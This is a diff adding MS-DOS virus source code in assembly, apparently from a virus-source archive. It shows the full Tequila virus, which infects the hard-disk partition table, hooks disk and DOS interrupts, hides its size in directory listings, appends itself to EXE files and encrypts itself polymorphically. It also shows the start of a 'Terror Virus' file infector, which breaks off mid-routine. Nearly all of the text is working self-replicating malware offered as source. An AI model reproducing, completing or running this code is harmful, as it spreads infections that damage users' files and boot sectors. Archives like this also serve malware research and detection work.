+ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
+ORG 0100
+TEQUILA PROC NEAR
+
+JMP START
+
+ DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH
+ DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH
+
+ DB 00DH, 00AH, 00DH, 00AH
+ DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH
+ DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"
+ DB "Switzerland.", 00DH, 00AH
+ DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH
+ DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH
+ DB "$"
+
+ DB "Execute: mov ax, FE03 / int 21. Key to go on!"
+
+
+PROGRAM_TERMINATION_ROUTINE:
+ PUSH BP
+ MOV BP,SP
+ SUB SP,0CH
+ PUSH AX
+ PUSH BX
+ PUSH CX
+ PUSH DX
+ PUSH SI
+ PUSH DI
+ PUSH ES
+ PUSH DS
+ PUSH CS
+ POP DS
+ MOV AX,W[6]
+ INC AX
+ JE 0243H ;Masm Mod. Needed
+ DEC AX
+ JNE 020DH ;Masm Mod. Needed
+ DEC W[8] ;Masm Mod. Needed
+ JNE 0243H ;Masm Mod. Needed
+ JMP 0246H ;Masm Mod. Needed
+ MOV AH,02AH
+ CALL INT_21
+ MOV SI,CX
+ MOV CX,W[8]
+ CMP CL,DL
+ JNE 022FH ;Masm Mod. Needed
+ MOV AX,SI
+ SUB AX,W[6]
+ MUL B[011H] ;Masm Mod. Needed
+ ADD AL,DH
+ ADD CH,3
+ CMP AL,CH
+ JAE 0237H ;Masm Mod. Needed
+ MOV W[6],0FFFFH ;Masm Mod. Needed
+ JMP 0243H ;Masm Mod. Needed
+ MOV W[6],0 ;Masm Mod. Needed
+ MOV W[8],3 ;Masm Mod. Needed
+ JMP 02DF ;Masm Mod. Needed
+ MOV BX,0B800H
+ INT 011
+ AND AX,030H
+ CMP AX,030H
+ JNE 0256H ;Masm Mod. Needed
+ MOV BX,0B000H
+ MOV ES,BX
+ XOR BX,BX
+ MOV DI,0FD8FH
+ MOV SI,0FC18H
+ MOV W[BP-2],SI
+ MOV W[BP-4],DI
+ MOV CX,01E
+ MOV AX,W[BP-2]
+ IMUL AX
+ MOV W[BP-8],AX
+ MOV W[BP-6],DX
+ MOV AX,W[BP-4]
+ IMUL AX
+ MOV W[BP-0C],AX
+ MOV W[BP-0A],DX
+ ADD AX,W[BP-8]
+ ADC DX,W[BP-6]
+ CMP DX,0F
+ JAE 02B0 ;Masm Mod. Needed
+ MOV AX,W[BP-2]
+ IMUL W[BP-4]
+ IDIV W[0F] ;Masm Mod. Needed
+ ADD AX,DI
+ MOV W[BP-4],AX
+ MOV AX,W[BP-8]
+ MOV DX,W[BP-6]
+ SUB AX,W[BP-0C]
+ SBB DX,W[BP-0A]
+ IDIV W[0D] ;Masm Mod. Needed
+ ADD AX,SI
+ MOV W[BP-2],AX
+ LOOP 0269 ;Masm Mod. Needed
+ INC CX
+ SHR CL,1
+ MOV CH,CL
+ MOV CL,0DB
+ ES MOV W[BX],CX ;Masm Mod. Needed
+ INC BX
+ INC BX
+ ADD SI,012
+ CMP SI,01B8
+ JL 0260 ;Masm Mod. Needed
+ ADD DI,034
+ CMP DI,02A3
+ JL 025D ;Masm Mod. Needed
+ XOR DI,DI
+ MOV SI,0BB
+ MOV CX,02D
+ CLD
+ MOVSB
+ INC DI
+ LOOP 02D7 ;Masm Mod. Needed
+ XOR AX,AX
+ INT 016
+ POP DS
+ POP ES
+ POP DI
+ POP SI
+ POP DX
+ POP CX
+ POP BX
+ POP AX
+ MOV SP,BP
+ POP BP
+ RET
+
+PRINT_MESSAGE:
+ PUSH DX
+ PUSH DS
+ PUSH CS
+ POP DS
+ MOV AH,9
+ MOV DX,012
+ CALL INT_21
+ POP DS
+ POP DX
+ RET
+
+NEW_PARTITION_TABLE:
+ CLI
+ XOR BX,BX
+ MOV DS,BX
+ MOV SS,BX
+ MOV SP,07C00
+ STI
+ XOR DI,DI
+ SUB W[0413],3 ;Masm Mod. Needed
+ INT 012
+ MOV CL,6
+ SHL AX,CL
+ MOV ES,AX
+ PUSH ES
+ MOV AX,022A
+ PUSH AX
+ MOV AX,0205
+ MOV CX,W[07C30]
+ INC CX
+ MOV DX,W[07C32]
+ INT 013
+ RETF
+
+DB 002, 0FE
+DB 04C, 0E9
+DB 080, 004
+
+ PUSH CS
+ POP DS
+ XOR AX,AX
+ MOV ES,AX
+ MOV BX,07C00
+ PUSH ES
+ PUSH BX
+ MOV AX,0201
+ MOV CX,W[0226]
+ MOV DX,W[0228]
+ INT 013
+ PUSH CS
+ POP ES
+ CLD
+ MOV SI,0409
+ MOV DI,09BE
+ MOV CX,046
+ REP MOVSB
+ MOV SI,091B
+ MOV DI,0A04
+ MOV CX,045
+ REP MOVSB
+ CLI
+ XOR AX,AX
+ MOV ES,AX
+ ES LES BX,[070] ;Masm Mod. Needed
+ MOV W[09B0],BX ;Masm Mod. Needed
+ MOV W[09B2],ES ;Masm Mod. Needed
+ MOV ES,AX
+ ES LES BX,[084] ;Masm Mod. Needed
+ MOV W[09B4],BX ;Masm Mod. Needed
+ MOV W[09B6],ES ;Masm Mod. Needed
+ MOV ES,AX
+ ES MOV W[070],044F ;Masm Mod. Needed
+ ES MOV W[072],DS ;Masm Mod. Needed
+ STI
+ RETF
+
+INSTALL:
+ CALL NEXT_LINE
+ NEXT_LINE:
+ POP SI
+ SUB SI,028F
+ PUSH SI
+ PUSH AX
+ PUSH ES
+ PUSH CS
+ POP DS
+ MOV AX,ES
+ ADD W[SI+2],AX
+ ADD W[SI+4],AX
+ DEC AX
+ MOV ES,AX
+ MOV AX,0FE02
+ INT 021
+ CMP AX,01FD
+ JE NO_PARTITION_INFECTION
+ ES CMP B[0],05A ;Masm Mod. Needed
+ JNE NO_PARTITION_INFECTION
+ ES CMP W[3],0BB ;Masm Mod. Needed
+ JBE NO_PARTITION_INFECTION
+ ES MOV AX,W[012] ;Masm Mod. Needed
+ SUB AX,0BB
+ MOV ES,AX
+ XOR DI,DI
+ MOV CX,09A4
+ CLD
+ REP MOVSB
+ PUSH ES
+ POP DS
+ CALL INFECT_PARTITION_TABLE
+ NO_PARTITION_INFECTION:
+ POP ES
+ POP AX
+ PUSH ES
+ POP DS
+ POP SI
+ CS MOV SS,W[SI+4] ;Masm Mod. Needed
+ CHAIN_TO_THE_HOST_FILE:
+ CS JMP D[SI] ;Masm Mod. Needed
+
+INFECT_PARTITION_TABLE:
+ MOV AH,02A
+ INT 021
+ MOV W[6],CX ;Masm Mod. Needed
+ MOV W[8],DX ;Masm Mod. Needed
+ MOV AH,052
+ INT 021
+ ES MOV AX,W[BX-2] ;Masm Mod. Needed
+ MOV W[03E8],AX ;Masm Mod. Needed
+ MOV AX,03513
+ INT 021
+ MOV W[09A0],BX ;Masm Mod. Needed
+ MOV W[09A2],ES ;Masm Mod. Needed
+ MOV AX,03501
+ INT 021
+ MOV SI,BX
+ MOV DI,ES
+ MOV AX,02501
+ MOV DX,03DA
+ INT 021
+ MOV B[0A],0 ;Masm Mod. Needed
+ PUSHF
+ POP AX
+ OR AX,0100
+ PUSH AX
+ POPF
+ MOV AX,0201
+ MOV BX,09A4
+ MOV CX,1
+ MOV DX,080
+ PUSH DS
+ POP ES
+ PUSHF
+ CALL D[09A0] ;Masm Mod. Needed
+ PUSHF
+ POP AX
+ AND AX,0FEFF
+ PUSH AX
+ POPF
+ PUSHF
+ MOV AX,02501
+ MOV DX,SI
+ MOV DS,DI
+ INT 021
+ POPF
+ JAE 0450 ;Masm Mod. Needed
+ JMP RET ;Masm Mod. Needed
+ PUSH ES
+ POP DS
+ CMP W[BX+02E],0FE02
+ JNE 045C ;Masm Mod. Needed
+ JMP RET ;Masm Mod. Needed
+ ADD BX,01BE
+ MOV CX,4
+ MOV AL,B[BX+4]
+ CMP AL,4
+ JE 0479 ;Masm Mod. Needed
+ CMP AL,6
+ JE 0479 ;Masm Mod. Needed
+ CMP AL,1
+ JE 0479 ;Masm Mod. Needed
+ ADD BX,010
+ LOOP 0463 ;Masm Mod. Needed
+ JMP SHORT RET ;Masm Mod. Needed
+ MOV DL,080
+ MOV DH,B[BX+5]
+ MOV W[0228],DX ;Masm Mod. Needed
+ MOV AX,W[BX+6]
+ MOV CX,AX
+ MOV SI,6
+ AND AX,03F
+ CMP AX,SI
+ JBE RET ;Masm Mod. Needed
+ SUB CX,SI
+ MOV DI,BX
+ INC CX
+ MOV W[0226],CX ;Masm Mod. Needed
+ MOV AX,0301
+ MOV BX,09A4
+ PUSHF
+ CALL D[09A0] ;Masm Mod. Needed
+ JB RET ;Masm Mod. Needed
+ DEC CX
+ MOV W[DI+6],CX
+ INC CX
+ SUB W[DI+0C],SI
+ SBB W[DI+0E],0
+ MOV AX,0305
+ MOV BX,0
+ INC CX
+ PUSHF
+ CALL D[09A0] ;Masm Mod. Needed
+ JB RET ;Masm Mod. Needed
+ MOV SI,01F6
+ MOV DI,09A4
+ MOV CX,034
+ CLD
+ REP MOVSB
+ MOV AX,0301
+ MOV BX,09A4
+ MOV CX,1
+ XOR DH,DH
+ PUSHF
+ CALL D[09A0] ;Masm Mod. Needed
+ RET
+
+NEW_INTERRUPT_ONE:
+ PUSH BP
+ MOV BP,SP
+ CS CMP B[0A],1 ;Masm Mod. Needed
+ JE 0506 ;Masm Mod. Needed
+ CMP W[BP+4],09B4
+ JA 050B ;Masm Mod. Needed
+ PUSH AX
+ PUSH ES
+ LES AX,[BP+2]
+ CS MOV W[09A0],AX ;Masm Mod. Needed
+ CS MOV W[09A2],ES ;Masm Mod. Needed
+ CS MOV B[0A],1
+ POP ES
+ POP AX
+ AND W[BP+6],0FEFF
+ POP BP
+ IRET
+
+NEW_INTERRUPT_13:
+ CMP CX,1
+ JNE 054E ;Masm Mod. Needed
+ CMP DX,080
+ JNE 054E ;Masm Mod. Needed
+ CMP AH,3
+ JA 054E ;Masm Mod. Needed
+ CMP AH,2
+ JB 054E ;Masm Mod. Needed
+ PUSH CX
+ PUSH DX
+ DEC AL
+ JE 0537 ;Masm Mod. Needed
+ PUSH AX
+ PUSH BX
+ ADD BX,0200
+ INC CX
+ PUSHF
+ CS CALL D[09A0] ;Masm Mod. Needed
+ POP BX
+ POP AX
+ MOV AL,1
+ CS MOV CX,W[0226] ;Masm Mod. Needed
+ CS MOV DX,W[0228] ;Masm Mod. Needed
+ PUSHF
+ CS CALL D[09A0] ;Masm Mod. Needed
+ POP DX
+ POP CX
+ RETF 2
+ CS JMP D[09A0] ;Masm Mod. Needed
+
+NEW_TIMER_TICK_INTERRUPT:
+ PUSH AX
+ PUSH BX
+ PUSH ES
+ PUSH DS
+ XOR AX,AX
+ MOV ES,AX
+ PUSH CS
+ POP DS
+ ES LES BX,[084] ;Masm Mod. Needed
+ MOV AX,ES
+ CMP AX,0800
+ JA 05B0 ;Masm Mod. Needed
+ CMP AX,W[09B6]
+ JNE 0575 ;Masm Mod. Needed
+ CMP BX,W[09B4]
+ JE 05B0 ;Masm Mod. Needed
+ MOV W[09B4],BX ;Masm Mod. Needed
+ MOV W[09B6],ES ;Masm Mod. Needed
+ XOR AX,AX
+ MOV DS,AX
+ CS LES BX,[09B0] ;Masm Mod. Needed
+ MOV W[070],BX ;Masm Mod. Needed
+ MOV W[072],ES ;Masm Mod. Needed
+ LES BX,[04C] ;Masm Mod. Needed
+ CS MOV W[09A0],BX ;Masm Mod. Needed
+ CS MOV W[09A2],ES ;Masm Mod. Needed
+ MOV W[04C],09BE ;Masm Mod. Needed
+ MOV W[04E],CS ;Masm Mod. Needed
+ MOV W[084],04B1 ;Masm Mod. Needed
+ MOV W[086],CS ;Masm Mod. Needed
+ POP DS
+ POP ES
+ POP BX
+ POP AX
+ IRET
+
+INT_21_INTERCEPT:
+ CMP AH,011
+ JB CHECK_FOR_HANDLE
+ CMP AH,012
+ JA CHECK_FOR_HANDLE
+ CALL ADJUST_FCB_MATCHES
+ RETF 2
+ CHECK_FOR_HANDLE:
+ CMP AH,04E
+ JB CHECK_FOR_PREVIOUS_INSTALLATION
+ CMP AH,04F
+ JA CHECK_FOR_PREVIOUS_INSTALLATION
+ CALL ADJUST_HANDLE_MATCHES
+ RETF 2
+ CHECK_FOR_PREVIOUS_INSTALLATION:
+ CMP AX,0FE02
+ JNE CHECK_FOR_MESSAGE_PRINT
+ NOT AX
+ IRET
+ CHECK_FOR_MESSAGE_PRINT:
+ CMP AX,0FE03
+ JNE CHECK_FOR_EXECUTE
+ CS CMP W[6],0 ;Masm Mod. Needed
+ JNE CHAIN_TO_TRUE_INT_21
+ CALL PRINT_MESSAGE
+ IRET
+ CHECK_FOR_EXECUTE:
+ CMP AX,04B00
+ JE SET_STACK
+ CMP AH,04C
+ JNE CHAIN_TO_TRUE_INT_21
+ SET_STACK:
+ CS MOV W[09A6],SP ;Masm Mod. Needed
+ CS MOV W[09A8],SS ;Masm Mod. Needed
+ CLI
+ PUSH CS
+ POP SS
+ MOV SP,0AE5
+ STI
+ CMP AH,04C
+ JNE TO_AN_INFECTION
+ CALL PROGRAM_TERMINATION_ROUTINE
+ JMP SHORT NO_INFECTION
+ TO_AN_INFECTION:
+ CALL INFECT_THE_FILE
+ NO_INFECTION:
+ CLI
+ CS MOV SS,W[09A8] ;Masm Mod. Needed
+ CS MOV SP,W[09A6] ;Masm Mod. Needed
+ STI
+ JMP SHORT CHAIN_TO_TRUE_INT_21
+ CHAIN_TO_TRUE_INT_21:
+ CS INC W[09BC] ;Masm Mod. Needed
+ CS JMP D[09B4] ;Masm Mod. Needed
+
+NEW_CRITICAL_ERROR_HANDLER:
+ MOV AL,3
+ IRET
+
+ADJUST_FCB_MATCHES:
+ PUSH BX
+ PUSH ES
+ PUSH AX
+ MOV AH,02F
+ CALL INT_21
+ POP AX
+ PUSHF
+ CS CALL D[09B4] ;Masm Mod. Needed
+ PUSHF
+ PUSH AX
+ CMP AL,0FF
+ JE 0664 ;Masm Mod. Needed
+ ES CMP B[BX],0FF ;Masm Mod. Needed
+ JNE 064F ;Masm Mod. Needed
+ ADD BX,7
+ ES MOV AL,B[BX+017] ;Masm Mod. Needed
+ AND AL,01F
+ CMP AL,01F
+ JNE 0664 ;Masm Mod. Needed
+ ES SUB W[BX+01D],09A4 ;Masm Mod. Needed
+ ES SBB W[BX+01F],0 ;Masm Mod. Needed
+ POP AX
+ POPF
+ POP ES
+ POP BX
+ RET
+
+ADJUST_HANDLE_MATCHES:
+ PUSH BX
+ PUSH ES
+ PUSH AX
+ MOV AH,02F
+ CALL INT_21
+ POP AX
+ PUSHF
+ CS CALL D[09B4] ;Masm Mod. Needed
+ PUSHF
+ PUSH AX
+ JB 0691 ;Masm Mod. Needed
+ ES MOV AL,B[BX+016] ;Masm Mod. Needed
+ AND AL,01F
+ CMP AL,01F
+ JNE 0691 ;Masm Mod. Needed
+ ES SUB W[BX+01A],09A4 ;Masm Mod. Needed
+ ES SBB W[BX+01C],0 ;Masm Mod. Needed
+ POP AX
+ POPF
+ POP ES
+ POP BX
+ RET
+
+WRITE_TO_THE_FILE:
+ MOV AH,040
+ JMP 069C ;Masm Mod. Needed
+
+READ_FROM_THE_FILE:
+ MOV AH,03F
+ CALL 06B4 ;Masm Mod. Needed
+ JB RET ;Masm Mod. Needed
+ SUB AX,CX
+ RET
+
+MOVE_TO_END_OF_FILE:
+ XOR CX,CX
+ XOR DX,DX
+ MOV AX,04202
+ JMP 06B4 ;Masm Mod. Needed
+
+MOVE_TO_BEGINNING_OF_FILE:
+ XOR CX,CX
+ XOR DX,DX
+ MOV AX,04200
+ CS MOV BX,W[09A4] ;Masm Mod. Needed
+
+INT_21:
+ CLI
+ PUSHF
+ CS CALL D[09B4] ;Masm Mod. Needed
+ RET
+
+INFECT_THE_FILE:
+ PUSH AX
+ PUSH BX
+ PUSH CX
+ PUSH DX
+ PUSH SI
+ PUSH DI
+ PUSH ES
+ PUSH DS
+ CALL CHECK_LETTERS_IN_FILENAME
+ JAE GOOD_NAME
+ JMP BAD_NAME
+
+GOOD_NAME:
+ PUSH DX
+ PUSH DS
+ PUSH CS
+ POP DS
+
+SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:
+ MOV AX,03524
+ CALL INT_21
+ MOV W[09B8],BX ;Masm Mod. Needed
+ MOV W[09BA],ES ;Masm Mod. Needed
+ MOV AX,02524
+ MOV DX,052A
+ CALL INT_21
+ POP DS
+ POP DX
+
+SAVE_AND_REPLACE_FILE_ATTRIBUTE:
+ MOV AX,04300
+ CALL INT_21
+ CS MOV W[09AA],CX ;Masm Mod. Needed
+ JAE 06FE ;Masm Mod. Needed
+ JMP RESTORE_CRIT_HANDLER
+ MOV AX,04301
+ XOR CX,CX
+ CALL INT_21
+ JB 077C ;Masm Mod. Needed
+
+OPEN_FILE_FOR_READ_WRITE:
+ MOV AX,03D02
+ CALL INT_21
+ JB 0771 ;Masm Mod. Needed
+ PUSH DX
+ PUSH DS
+ PUSH CS
+ POP DS
+ MOV W[09A4],AX ;Masm Mod. Needed
+
+GET_FILEDATE:
+ MOV AX,05700
+ CALL 06B4 ;Masm Mod. Needed
+ JB 075C ;Masm Mod. Needed
+ MOV W[09AC],DX ;Masm Mod. Needed
+ MOV W[09AE],CX ;Masm Mod. Needed
+
+READ_AND_CHECK_EXE_HEADER:
+ CALL 06AD ;Masm Mod. Needed
+ MOV DX,0A49
+ MOV CX,01C
+ CALL 069A ;Masm Mod. Needed
+ JB 075C ;Masm Mod. Needed
+ PUSH DS
+ POP ES
+ MOV DI,0E8
+ MOV CX,020
+ CMP W[0A49],05A4D ;Masm Mod. Needed
+ JNE 075C ;Masm Mod. Needed
+ MOV AX,W[0A5B]
+ CLD
+ REPNE SCASW
+ JNE 0754 ;Masm Mod. Needed
+ OR W[09AE],01F ;Masm Mod. Needed
+ JMP 075C ;Masm Mod. Needed
+ CALL READ_PAST_END_OF_FILE
+ JB 075C ;Masm Mod. Needed
+ CALL ENCRYPT_AND_WRITE_TO_FILE
+
+RESTORE_ALTERED_DATE:
+ MOV AX,05701
+ MOV DX,W[09AC]
+ MOV CX,W[09AE]
+ CALL 06B4 ;Masm Mod. Needed
+
+CLOSE_THE_FILE:
+ MOV AH,03E
+ CALL 06B4 ;Masm Mod. Needed
+
+RESTORE_FILE_ATTRIBUTE:
+ POP DS
+ POP DX
+ MOV AX,04301
+ CS MOV CX,W[09AA] ;Masm Mod. Needed
+ CALL INT_21
+
+RESTORE_CRIT_HANDLER:
+ MOV AX,02524
+ CS LDS DX,[09B8] ;Masm Mod. Needed
+ CALL INT_21
+
+BAD_NAME:
+ POP DS
+ POP ES
+ POP DI
+ POP SI
+ POP DX
+ POP CX
+ POP BX
+ POP AX
+ RET
+
+CHECK_LETTERS_IN_FILENAME:
+ PUSH DS
+ POP ES
+ MOV DI,DX
+ MOV CX,-1
+ XOR AL,AL
+ CLD
+ REPNE SCASB
+ NOT CX
+ MOV DI,DX
+ MOV AX,04353
+ MOV SI,CX
+ SCASW
+ JE 07B7 ;Masm Mod. Needed
+ DEC DI
+ LOOP 07A5 ;Masm Mod. Needed
+ MOV CX,SI
+ MOV DI,DX
+ MOV AL,056
+ REPNE SCASB
+ JE 07B7 ;Masm Mod. Needed
+ CLC
+ RET
+ STC
+ RET
+
+READ_PAST_END_OF_FILE:
+ MOV CX,-1
+ MOV DX,-0A
+ CALL 06A8 ;Masm Mod. Needed
+ MOV DX,0A65
+ MOV CX,8
+ CALL 069A ;Masm Mod. Needed
+ JB RET ;Masm Mod. Needed
+ CMP W[0A65],0FDF0 ;Masm Mod. Needed
+ JNE 07F0 ;Masm Mod. Needed
+ CMP W[0A67],0AAC5 ;Masm Mod. Needed
+ JNE 07F0 ;Masm Mod. Needed
+ MOV CX,-1
+ MOV DX,-9
+ CALL 06A8 ;Masm Mod. Needed
+ MOV DX,0A6B
+ MOV CX,4
+ CALL 0696 ;Masm Mod. Needed
+ RET
+ CLC
+ RET
+
+ENCRYPT_AND_WRITE_TO_FILE:
+ CALL MOVE_TO_END_OF_FILE
+ MOV SI,AX
+ MOV DI,DX
+ MOV BX,0A49
+ MOV AX,W[BX+4]
+ MUL W[0D] ;Masm Mod. Needed
+ SUB AX,SI
+ SBB DX,DI
+ JAE 080C ;Masm Mod. Needed
+ JMP OUT_OF_ENCRYPT
+ MOV AX,W[BX+8]
+ MUL W[0B] ;Masm Mod. Needed
+ SUB SI,AX
+ SBB DI,DX
+ MOV AX,W[BX+0E]
+ MOV W[4],AX ;Masm Mod. Needed
+ ADD W[4],010 ;Masm Mod. Needed
+ MUL W[0B] ;Masm Mod. Needed
+ ADD AX,W[BX+010]
+ SUB AX,SI
+ SBB DX,DI
+ JB 083C ;Masm Mod. Needed
+ SUB AX,080
+ SBB DX,0
+ JB RET ;Masm Mod. Needed
+ ADD W[BX+0E],09B
+ MOV AX,W[BX+016]
+ ADD AX,010
+ MOV W[2],AX ;Masm Mod. Needed
+ MOV AX,W[BX+014]
+ MOV W[0],AX ;Masm Mod. Needed
+ CALL 06A4 ;Masm Mod. Needed
+ ADD AX,09A4
+ ADC DX,0
+ DIV W[0D] ;Masm Mod. Needed
+ INC AX
+ MOV W[0A4D],AX ;Masm Mod. Needed
+ MOV W[0A4B],DX ;Masm Mod. Needed
+ MOV DX,DI
+ MOV AX,SI
+ DIV W[0B] ;Masm Mod. Needed
+ MOV W[0A5F],AX ;Masm Mod. Needed
+ MOV BX,DX
+ ADD DX,0960
+ MOV W[0A5D],DX ;Masm Mod. Needed
+ CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE
+ JB RET ;Masm Mod. Needed
+ OR W[09AE],01F ;Masm Mod. Needed
+ MOV BX,W[09BC]
+ AND BX,01F
+ SHL BX,1
+ MOV AX,W[BX+0E8]
+ MOV W[0A5B],AX ;Masm Mod. Needed
+ CALL MOVE_TO_BEGINNING_OF_FILE
+ MOV CX,01C
+ MOV DX,0A49
+
+WRITE_THE_NEW_HEADER:
+ CALL 0696 ;Masm Mod. Needed
+ OUT_OF_ENCRYPT:
+ RET
+
+COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:
+ PUSH BP
+ XOR AH,AH
+ INT 01A
+ MOV AX,DX
+ MOV BP,DX
+ PUSH DS
+ POP ES
+ MOV DI,0960
+ MOV SI,DI
+ MOV CX,020
+ CLD
+ REP STOSW
+ XOR DX,DX
+ MOV ES,DX
+ CALL ENCRYPT_STEP_ONE
+ CALL ENCRYPT_STEP_TWO
+ CALL ENCRYPT_STEP_THREE
+ MOV B[SI],0E9
+ MOV DI,028C
+ SUB DI,SI
+ SUB DI,3
+ INC SI
+ MOV W[SI],DI
+ MOV AX,0A04
+ CALL AX
+ POP BP
+ RET
+
+ENCRYPT_STEP_ONE:
+ DEC BP
+ ES TEST B[BP],2 ;Masm Mod. Needed
+ JNE 08EB ;Masm Mod. Needed
+ MOV B[SI],0E
+ INC SI
+ CALL GARBLER
+ MOV B[SI],01F
+ INC SI
+ CALL GARBLER
+ RET
+ MOV W[SI],0CB8C
+ INC SI
+ INC SI
+ CALL GARBLER
+ MOV W[SI],0DB8E
+ INC SI
+ INC SI
+ CALL GARBLER
+ RET
+
+ENCRYPT_STEP_TWO:
+ AND CH,0FE
+ DEC BP
+ ES TEST B[BP],2 ;Masm Mod. Needed
+ JE 0920 ;Masm Mod. Needed
+ OR CH,1
+ MOV B[SI],0BE
+ INC SI
+ MOV W[SI],BX
+ INC SI
+ INC SI
+ CALL GARBLER
+ ADD BX,0960
+ TEST CH,1
+ JE 0934 ;Masm Mod. Needed
+ MOV B[SI],0BB
+ INC SI
+ MOV W[SI],BX
+ INC SI
+ INC SI
+ CALL GARBLER
+ ADD BX,0960
+ TEST CH,1
+ JE 090C ;Masm Mod. Needed
+ SUB BX,0960
+ CALL GARBLER
+ MOV B[SI],0B9
+ INC SI
+ MOV AX,0960
+ MOV W[SI],AX
+ INC SI
+ INC SI
+ CALL GARBLER
+ CALL GARBLER
+ RET
+
+ENCRYPT_STEP_THREE:
+ MOV AH,014
+ MOV DH,017
+ TEST CH,1
+ JE 0958 ;Masm Mod. Needed
+ XCHG DH,AH
+ MOV DI,SI
+ MOV AL,08A
+ MOV W[SI],AX
+ INC SI
+ INC SI
+ CALL GARBLER
+ XOR DL,DL
+ MOV B[0A39],028 ;Masm Mod. Needed
+ DEC BP
+ ES TEST B[BP],2 ;Masm Mod. Needed
+ JE 0978 ;Masm Mod. Needed
+ MOV DL,030
+ MOV B[0A39],DL ;Masm Mod. Needed
+ MOV W[SI],DX
+ INC SI
+ INC SI
+ MOV W[SI],04346
+ INC SI
+ INC SI
+ CALL GARBLER
+ MOV AX,0FE81
+ MOV CL,0BE
+ TEST CH,1
+ JE 0993 ;Masm Mod. Needed
+ MOV AH,0FB
+ MOV CL,0BB
+ MOV W[SI],AX
+ INC SI
+ INC SI
+ PUSH BX
+ ADD BX,040
+ MOV W[SI],BX
+ INC SI
+ INC SI
+ POP BX
+ MOV B[SI],072
+ INC SI
+ MOV DX,SI
+ INC SI
+ CALL GARBLER
+ MOV B[SI],CL
+ INC SI
+ MOV W[SI],BX
+ INC SI
+ INC SI
+ MOV AX,SI
+ SUB AX,DX
+ DEC AX
+ MOV BX,DX
+ MOV B[BX],AL
+ CALL GARBLER
+ CALL GARBLER
+ MOV B[SI],0E2
+ INC SI
+ SUB DI,SI
+ DEC DI
+ MOV AX,DI
+ MOV B[SI],AL
+ INC SI
+ CALL GARBLER
+ RET
+
+GARBLER:
+ DEC BP
+ ES TEST B[BP],0F ;Masm Mod. Needed
+ JE RET ;Masm Mod. Needed
+ DEC BP
+ ES MOV AL,B[BP] ;Masm Mod. Needed
+ TEST AL,2
+ JE 0A0E ;Masm Mod. Needed
+ TEST AL,4
+ JE 09F7 ;Masm Mod. Needed
+ TEST AL,8
+ JE 09F1 ;Masm Mod. Needed
+ MOV W[SI],0C789
+ INC SI
+ INC SI
+ JMP RET ;Masm Mod. Needed
+ MOV B[SI],090
+ INC SI
+ JMP RET ;Masm Mod. Needed
+ MOV AL,085
+ DEC BP
+ ES MOV AH,B[BP] ;Masm Mod. Needed
+ TEST AH,2
+ JE 0A05 ;Masm Mod. Needed
+ DEC AL
+ OR AH,0C0
+ MOV W[SI],AX
+ INC SI
+ INC SI
+ JMP RET ;Masm Mod. Needed
+ DEC BP
+ ES TEST B[BP],2 ;Masm Mod. Needed
+ JE 0A1A ;Masm Mod. Needed
+ MOV AL,039
+ JMP 09F9 ;Masm Mod. Needed
+ MOV B[SI],0FC
+ INC SI
+ RET
+
+MAKE_THE_DISK_WRITE:
+ CALL PERFORM_ENCRYPTION_DECRYPTION
+ MOV AH,040
+ MOV BX,W[09A4]
+ MOV DX,0
+ MOV CX,09A4
+ PUSHF
+ CALL D[09B4] ;Masm Mod. Needed
+ JB 0A37 ;Masm Mod. Needed
+ SUB AX,CX
+ PUSHF
+ CMP B[0A39],028 ;Masm Mod. Needed
+ JNE 0A44 ;Masm Mod. Needed
+ MOV B[0A39],0 ;Masm Mod. Needed
+ CALL PERFORM_ENCRYPTION_DECRYPTION
+ POPF
+ RET
+
+PERFORM_ENCRYPTION_DECRYPTION:
+ MOV BX,0
+ MOV SI,0960
+ MOV CX,0960
+ MOV DL,B[SI]
+ XOR B[BX],DL
+ INC SI
+ INC BX
+ CMP SI,09A0
+ JB 0A61 ;Masm Mod. Needed
+ MOV SI,0960
+ LOOP 0A52 ;Masm Mod. Needed
+ RET
+
+THE_FILE_DECRYPTING_ROUTINE:
+ PUSH CS
+ POP DS
+ MOV BX,4
+ MOV SI,0964
+ MOV CX,0960
+ MOV DL,B[SI]
+ ADD B[BX],DL
+ INC SI
+ INC BX
+ CMP SI,09A4
+ JB 0A7E ;Masm Mod. Needed
+ MOV SI,0964
+ LOOP 0A6F ;Masm Mod. Needed
+ JMP 0390 ;Masm Mod. Needed
+
+;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========
+;========== BUT IS MERELY THE BOOSTER. ========
+
+START:
+ LEA W[0104],EXIT ;Masm Mod. Needed
+ MOV W[0106],CS ;Masm Mod. Needed
+ MOV BX,CS
+ SUB W[0106],BX ;Masm Mod. Needed
+ JMP INSTALL
+
+EXIT:
+ INT 020
+
+TEQUILA ENDP
+CODE_SEG ENDS
+END TEQUILA
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.terror.asm b/MSDOS/Virus.MSDOS.Unknown.terror.asm
new file mode 100644
index 00000000..2feafde5
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.terror.asm
@@ -0,0 +1,492 @@
+;**********************************************
+; Terror Virus
+;**********************************************
+
+Code Segment
+ Assume CS:Code
+ Org 100h
+
+Start: jmp short Begin
+
+Table310 dw 12E4h,09ABh
+Table320 dw 138Dh,17D0h
+Table330 dw 1460h,0F7Ah
+
+FileBytes dw 12 dup (9090h)
+
+ComSpec db 'A:\COMMAND.COM',0
+
+CheckEXE: cmp cs:FileBytes,4D5Ah
+ je IsEXE
+ cmp cs:FileBytes,5A4Dh
+IsEXE: ret
+
+Begin: mov word ptr cs:PSPSeg,ds
+ push ax
+ mov ax,0EC59h
+ int 21h
+ cmp bp,ax
+ jnz Install
+ push cs
+ pop ds
+StartFile: pop ax
+ mov es,word ptr cs:PSPSeg
+ call CheckEXE
+ je ExeFileStart
+ mov cx,13
+ mov si,offset FileBytes
+ push es
+ mov di,100h
+ push di
+ rep movsb
+ push es
+ pop ds
+ retf
+ExeFileStart: mov si,es
+ add si,10h
+ add cs:FileBytes [16h],si
+ add si,cs:FileBytes [0Eh]
